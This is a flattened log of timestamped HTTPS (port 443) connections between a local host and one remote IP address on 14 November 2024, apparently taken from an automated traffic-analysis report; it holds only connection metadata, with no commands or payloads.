                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.103666067 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.103892088 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.131660938 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.131768942 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.131788015 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.131823063 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.133550882 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.133550882 CET49707443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.133569956 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.133580923 CET4434970713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.202440977 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.202480078 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.202600956 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.202645063 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.202661037 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.202893972 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.203644991 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.203648090 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.203655958 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.203661919 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.205660105 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.205667019 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.205681086 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.205682993 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.205760956 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.205760956 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.209664106 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.209678888 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.209753990 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.209769011 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.211513996 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.211523056 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.211937904 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.213886023 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.213907003 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.945908070 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.958368063 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.958376884 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.977260113 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.977787971 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.980962038 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.980966091 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.996570110 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:19.996598959 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.002661943 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.002669096 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.009113073 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.009191036 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.012276888 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.012291908 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109409094 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109468937 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109539032 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109548092 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109590054 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109608889 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109741926 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109741926 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109759092 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109767914 CET49713443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.109772921 CET4434971313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113380909 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113473892 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113573074 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113761902 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.113780022 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.133523941 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134151936 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134160042 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134599924 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.134603977 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.136955976 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137088060 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137188911 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137367964 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137387037 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137401104 CET49714443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.137407064 CET4434971413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.139880896 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.139957905 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.140044928 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.140176058 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.140198946 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267750025 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267770052 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267806053 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267832994 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.267851114 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279552937 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279563904 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279572010 CET49715443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.279576063 CET4434971513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.294121027 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.294213057 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.294292927 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.296168089 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.296205044 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.327877045 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332128048 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332142115 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332633972 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.332638025 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.348758936 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349630117 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349705935 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349739075 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349752903 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349766016 CET49711443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.349770069 CET4434971113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.353008986 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.353055000 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.353122950 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.353471041 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.353487015 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470367908 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470400095 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470468044 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470479965 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470516920 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470525026 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470570087 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470938921 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470949888 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470966101 CET49712443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.470969915 CET4434971213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.474620104 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.474708080 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.474797964 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.475018978 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.475052118 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.881113052 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.881886005 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.881908894 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.883826971 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.883833885 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.893368959 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.894682884 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.894711018 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.895081043 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:20.895085096 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.012644053 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.012703896 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.012773991 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.013021946 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.013036966 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.013048887 CET49716443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.013055086 CET4434971613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.015758991 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.015801907 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.015952110 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.017254114 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.017277956 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.024434090 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.025506973 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.025564909 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.025712967 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.025728941 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.025743008 CET49717443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.025746107 CET4434971713.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.028050900 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.028095961 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.028152943 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.029284000 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.029298067 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.047452927 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.047981024 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.048011065 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.048820972 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.048876047 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.137455940 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.138000965 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.138067961 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.138422966 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.138437033 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.181157112 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.181272984 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.181327105 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.181575060 CET49718443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.181590080 CET4434971813.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.184537888 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.184575081 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.185658932 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.185659885 CET49723443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.185700893 CET4434972313.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.251224041 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.251734018 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.251763105 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.252255917 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.252262115 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.278656006 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.278794050 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.279067039 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.279227972 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.279249907 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.279262066 CET49719443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.279267073 CET4434971913.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.281721115 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.281750917 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.281897068 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.282198906 CET49724443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.282210112 CET4434972413.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385448933 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385713100 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385772943 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385814905 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385835886 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385849953 CET49720443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.385855913 CET4434972013.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388523102 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388572931 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388767958 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388832092 CET49725443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.388844967 CET4434972513.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.749336958 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750471115 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750494003 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750678062 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.750684023 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.767847061 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768469095 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768501997 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768984079 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.768996954 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.883759022 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884001970 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884291887 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884409904 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884409904 CET49721443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884432077 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.884442091 CET4434972113.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887659073 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887692928 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887769938 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887989998 CET49726443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.887996912 CET4434972613.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896543980 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896713018 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896830082 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896868944 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896868944 CET49722443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896892071 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.896905899 CET4434972213.107.246.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                        Nov 14, 2024 15:25:21.899893045 CET49727443192.168.2.513.107.246.45
